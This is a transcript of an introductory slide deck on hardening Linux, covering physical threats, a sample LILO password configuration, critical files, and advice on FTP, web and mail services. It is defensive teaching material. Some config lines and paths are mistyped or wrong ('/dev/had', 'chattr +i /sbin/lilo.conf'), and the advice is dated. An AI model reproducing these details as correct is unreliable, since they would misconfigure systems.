1 / 18

Securing the Linux Operating System Erik P. Friebolin

Securing the Linux Operating System Erik P. Friebolin. Introduction.

bambi
Télécharger la présentation

Securing the Linux Operating System Erik P. Friebolin

An Image/Link below is provided (as is) to download presentation Download Policy: Content on the Website is provided to you AS IS for your information and personal use and may not be sold / licensed / shared on other websites without getting consent from its author. Content is provided to you AS IS for your information and personal use only. Download presentation by click this link. While downloading, if for some reason you are not able to download a presentation, the publisher may have deleted the file from their server. During download, if you can't get a presentation, the file might be deleted by the publisher.

E N D

Presentation Transcript

  1. Securing the Linux Operating System Erik P. Friebolin

  2. Introduction Security is not something that is achieved as a final end goal; it is not a finished state. Rather, it’s a way of setting up, maintaining, and running an operating system, network, or environment. It’s a state of mind and a way of life. It depends on the day to day actions of the users and system administrators. It also depends on the security not being so intrusive that it encourages users and administrators to “work around it”.

  3. Security Breaches • Exposure • A form of possible loss or harm in a computing system. • Vulnerability • Weakness that might be exploited to cause loss or harm. • Threats • Circumstances that have the potential to cause loss or harm.

  4. Security Goals • Confidentiality • The assets of a computing system are accessible only by authorized parties. • Integrity • Assets can be modified only by authorized parties or only in authorized ways. • Availability • Assets are accessible to authorized parties.

  5. Steps to Security • To decide how to secure your systems, you need to decide how you intend to use them. • Decide what services a system is intended to use. • Decide what services a system is intended to provide locally. • Decide what services a system is intended to provide globally • Develop a security policy based on the needs of the system which are to be secured.

  6. Physical Security • Rebooting the system from other media such as floppy disk, CD-ROM, external SCSI drives and so on • Removing the case, and removing the BIOS battery to get around any BIOS restrictions • Using a default BIOS password to gain access to the BIOS • Rebooting the system and passing boot arguments to LILO • Installing physical monitoring devices such as KeyGhost • Stealing the system’s disk(s) • Unplug the server, or turn the power bar off (a very effective DoS), if done several times this can lead to file system corruption

  7. Console Security • LILO Security • Prevent attacker from using single user mode. boot=/dev/had map=/boot/map install=/boot/boot.b prompttimeout=50 message=/boot/message Linear default=linux   password=thisisapassword restricted 

  8. Console Security (cont’) image=/boot/vmlinuz-2.2.18 label=linux read-only root=/dev/hda1  image=/boot/vmlinuz-2.2.17 label=linux-old read-only root=/dev/hda1 • Prevent changes to lilo.conf file. • chattr +i /sbin/lilo.conf

  9. Critical System Config Files • /etc/directory - contains the majority of the system and application configuration files and many critical startup scripts • /etc/passwd - contains the mappings of username, user ID and the primary group ID that person belongs to. • /etc/shadow/ - The shadow file holds the username and password pairs, as well as account information such as expiry date, and any other special fields.

  10. Critical System Config Files • /etc/groups/ - The groups file contains all the group membership information, and optional items such as group password • /etc/gshadow/ - Similar to the password shadow file, this file contains the groups, password and members • /etc/shells/ - The shells file contains a list of valid shells

  11. File System Encryption • TCFS – kernel level data encryption utility (http://www.tcfs.it) • BestCrypt – disk encryption program available for Windows and Linux. (http://www.jetico.com) • PPDD - uses a partition which is encrypted and mounted using the PPDD driver (http://linux01.gwdg.de/~alatham/)

  12. FTP Services • If you are running anonymous FTP, watch permissions closely. • Do not permit anonymous FTP both read and write access to any files or directories. • If you are not running anonymous FTP, make sure you are not.

  13. WEB Services • Do not install any example CGI scripts or applications you do not need. • Do not allow common users to install arbitrary CGI scripts. • Do not allow unrestricted server-side includes. • Do not permit client access forms or chat systems to insert arbitrary HTML into web pages.

  14. E-Mail Services • If you are not providing remote access to mailbox accounts, make sure that POP and IMAP are not enabled. • If you are providing POP or IMAP access to mailbox accounts, consider switching to SSL enabled versions of both clients and servers. • Limit spam abuse by limiting mail relaying.

  15. Operating Securely • Never operate routinely as root. • Do not use root, “super”, or “sudo” in place of proper group permissions and membership. • Do not use a browser or chat program as root. • Do not allow/use easily guessable passwords • Avoid HTML enabled e-mail capable of responding to active content.

  16. Security Tools/Enhancements • Use Secure Shell (ssh) for remote access. • Enable long passwords, MD5 hashing of passwords, and shadow password files. • Periodically run a scanning tool (Internet Scanner or Nessus). • Install an Intrusion Detection System (Abacus or tcpdump). • Enable firewall code.

  17. Bastille Linux • Attempts to “harden” or “tighten” the Linux operating system. • Currently supports Red Hat and Mandrake systems (other versions coming soon). • http://www.bastille-linux.org/

  18. References • http://www.sans.org/linux.htm • http://www.seifried.org/lasg/ • http://www.tldp.org/LDP/solrhe/Securing-Optimizing-Linux-RH-Edition-v1.3/ • http://www.linuxsecurity.com/ • http://www.tldp.org/HOWTO/Security-HOWTO/

More Related